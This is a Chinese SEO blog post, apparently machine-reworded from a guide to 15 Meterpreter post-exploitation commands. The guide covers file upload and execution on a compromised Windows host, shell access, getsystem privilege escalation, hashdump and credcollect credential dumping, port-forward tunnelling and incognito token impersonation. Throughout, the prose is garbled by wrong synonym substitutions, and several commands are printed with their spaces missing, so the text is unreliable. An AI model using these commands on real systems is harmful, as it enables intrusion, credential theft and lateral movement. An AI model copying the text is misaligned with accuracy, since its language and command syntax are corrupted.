• SEO文章推广! 合作联系qq:122325244 正式全面改版 !免费SEO地址:https://www.seozhan.cn/tool 站长QQ群
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏SEO站长博客吧

meterpreter必知必会的15个号召

脚本编程 SEO站长博客 4个月前 (08-01) 39次浏览 已收录 0个评论

摘要

meterpreter是一种高级、潜伏、众层面的且可动态扩展的 payload,能够将反射 dll 注入到倾向主机的内存中,还能够正在运转时动态加载剧本和插件来举行后渗出运用。

网罗提权、转存体系账号、键盘纪录、悠久后门供职、启用长途桌面等,尚有良众其他的扩展。并且,meterpreter shell 的所有通讯都是默认加密的。

由于meterpreter供应的是一个全新的处境,是以咱们本文来诠释少许必备的meterpreter号召,带你初学而且慢慢熟练这款强壮的东西。

号召1:上传文献到 Windows主机

轻易来说,你能够上传本机的恣意文献到长途倾向主机中。

   号召:upload<file><destination>

留意:应用-r 参数能够递归上传上传目次和文献

号召2:从 windows主机下载文献

download号召能够下载长途主机上的文献

   号召:download<file><pathtosave>

留意:Windows 旅途要应用双斜线

假如咱们须要递归下载所有目次网罗子目次和文献,咱们能够应用 download -r 号召

号召 3:正在倾向主机上践诺 exe 文献

咱们也能够应用 execute 号召正在倾向主机上践诺利用标准

语法也非凡轻易

   号召:execute-f<path>[options]

号召 4:创修 CMD 新通道

假如你念正在倾向主机上践诺号召提示符,你能够应用下列号召:

   号召:execute-fcmd-c

号召 5:显示过程

ps 号召会显示倾向主机上总共正正在运转的过程

   号召:ps

号召 6:获取倾向主机的 cmd shell

shell 号召能够进入倾向主机的 cmd

   号召:shell

号召 7:获取 admin 权限

getsystem 号召能够提权到当地体系权限

   号召:getsystem

号召 8:应用 Hashdump 转储总共 hash 值

咱们能够应用meterpreter shell 来 dump 倾向主机确当前体系账户和暗号。转储的实质是 NTML 哈希款式,网上有良众东西和技艺来破解它们。

NTLM 正在线破解:

   号召:hashdump

输出的每一行实质款式如下

   Username:SID:LMhash:NTLMhash:::

如图所示

本次践诺输出了 5 个用户账号,分裂是 Administrator,Guest,HelpAssistant,Owner and SUPPORT_388945a0

号召 9:应用 Credcollect 转储 hash 值

尚有一个近似的剧本叫 credential_collector,也能够搜集倾向主机的 tokens

   号召:runcredcollect

号召 10:创修端口转发

meterpreter shell 中的 portfwd 号召是转发手艺中最常用的一个号召,能够让攻击体系访候向来无法直接访候的倾向主机。

add 选项会将端口转发增加到列外中,并且性质上会创修一个地道。

请留意:这个地道存正在于 meterpreter 节制台以外,任何终端会话都能够应用。

   号召:portfwdadd-l<portnumber>-r<TargetIP>

号召 11:删除端口转发

跟创修端口转发号召近似,这条号召是删除一条端口转发纪录

   号召:portfwddelete-l<portnumber>-p<portnumber>-r<TargetIP>

假如你念显示总共端口转发纪录,你能够应用 portfwd list 号召,假如你念删除总共的纪录,能够应用 portfwd flush 号召

号召 12:正在倾向主机上摸索文献

摸索号召能够后定位查找倾向主机上的特定文献。这个号召能够摸索所有文献体系,也能够摸索特定的文献夹。

比方,假如你念摸索倾向主机上的总共 txt 文献,能够应用下列号召:

   号召:search-f*.txt

号召 13:获取用户 ID

getuid 号召会显示主机上运转 meterpreter 供职的用户

   号召:getuid

号召 14:获取体系消息

sysinfo 号召会显示体系名,操作体系,架构和措辞等。

   号召:sysinfo

号召 15:模仿恣意用户(token 操作)

这个过程对待攻击像微软勾当目次如此的分散式体系非凡有助助,由于正在微软勾当目次中,当地访候权限并没众大用,然而假如能搞到凭证越发是打点员凭证,那就非凡有效了。

incognito 最出手是一个独立的利用,当你获胜入侵体系后能够用它来模仿用户 tokens。这个利用自后集成到了 metasploit,而且最终集成到了 meterpreter 中,应用如下:

·正在 meterpreter 会话中加载这个模块非凡轻易,只消输入 use incognito 号召即可

·输入 list_tokens -u 来显示总共有用的 tokens

·然后咱们须要模仿某个 token 来获取其权限。尚有留意,假如获胜模仿了一个 token,咱们能够应用 getuid 号召来检讨今朝用户 ID

   号召: useincognito list_tokens-u impersonate_token“Machine\\user”


SEO站长博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:meterpreter必知必会的15个号召
喜欢 (0)
[h4ck3st@126.com]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址